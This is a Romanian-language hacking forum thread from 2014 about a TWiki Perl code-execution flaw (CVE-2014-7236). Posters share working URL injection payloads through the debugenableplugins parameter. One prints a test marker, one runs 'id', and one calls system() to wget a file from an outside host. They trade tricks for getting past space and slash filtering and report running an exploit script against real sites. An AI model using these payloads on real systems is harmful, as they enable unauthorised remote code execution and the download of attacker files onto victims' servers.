cyadron Posted October 10, 2014 Report Posted October 10, 2014 (edited) http://www.example.com/twiki/bin/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexitThe TWiki site is vulnerable if you see a page with text "Vulnerable!".Source:Twiki Perl Code Execution ? Packet StormAcum singura chestie care mai ramane de facut e sa ajungeti la RCE.Daca are cineva vreo metoda va rog... Edited October 10, 2014 by cyadron Quote
Active Members dancezar Posted October 10, 2014 Active Members Report Posted October 10, 2014 SmiliesPlugin%3bprint%28%22Content-Type:text/html\r\n\r\nVulnerable!%22.qx/id/%29%3bexit Quote
cyadron Posted October 10, 2014 Author Report Posted October 10, 2014 (edited) Multam dany. Edited October 10, 2014 by cyadron Quote
icebaby Posted October 13, 2014 Report Posted October 13, 2014 (edited) a Edited May 6, 2016 by icebaby Quote
cyadron Posted October 13, 2014 Author Report Posted October 13, 2014 Nu uita sa faci escape la caractere precum "/" cu "\". Ex: http:// va deveni http:\/\/ Quote
Active Members dancezar Posted October 13, 2014 Active Members Report Posted October 13, 2014 SmiliesPlugin%3b$link=%22wget%22.chr(32).%22http://site.com/aaaa%22%3bprint%28%22Content-Type:text/html\r\n\r\nVulnerable!%22%29%3bsystem($link)%3bexitProblema is spatiile... Quote
cyadron Posted October 13, 2014 Author Report Posted October 13, 2014 poti folosi \t(tab) acolo unde ai nevoie de spatiu Quote
icebaby Posted October 13, 2014 Report Posted October 13, 2014 (edited) a Edited May 6, 2016 by icebaby Quote
florinul Posted October 14, 2014 Report Posted October 14, 2014 da icebaby da nu poti da wget da eraore [-] Exploit Failed Quote
Htich Posted October 14, 2014 Report Posted October 14, 2014 perl a.pl (access denied) WebHome < Main/WebHome < TWiki "uname -a"[*] TWiki code execution CVE-2014-7236[*] m0nad <m0nad/at/email.com>[-] Exploit Failedcam nimica nu mai gasesti bun .. rata de vulnerabilitate 1% Quote
florinul Posted October 14, 2014 Report Posted October 14, 2014 sunt cateva bune da cand dai wget da expoit faild Quote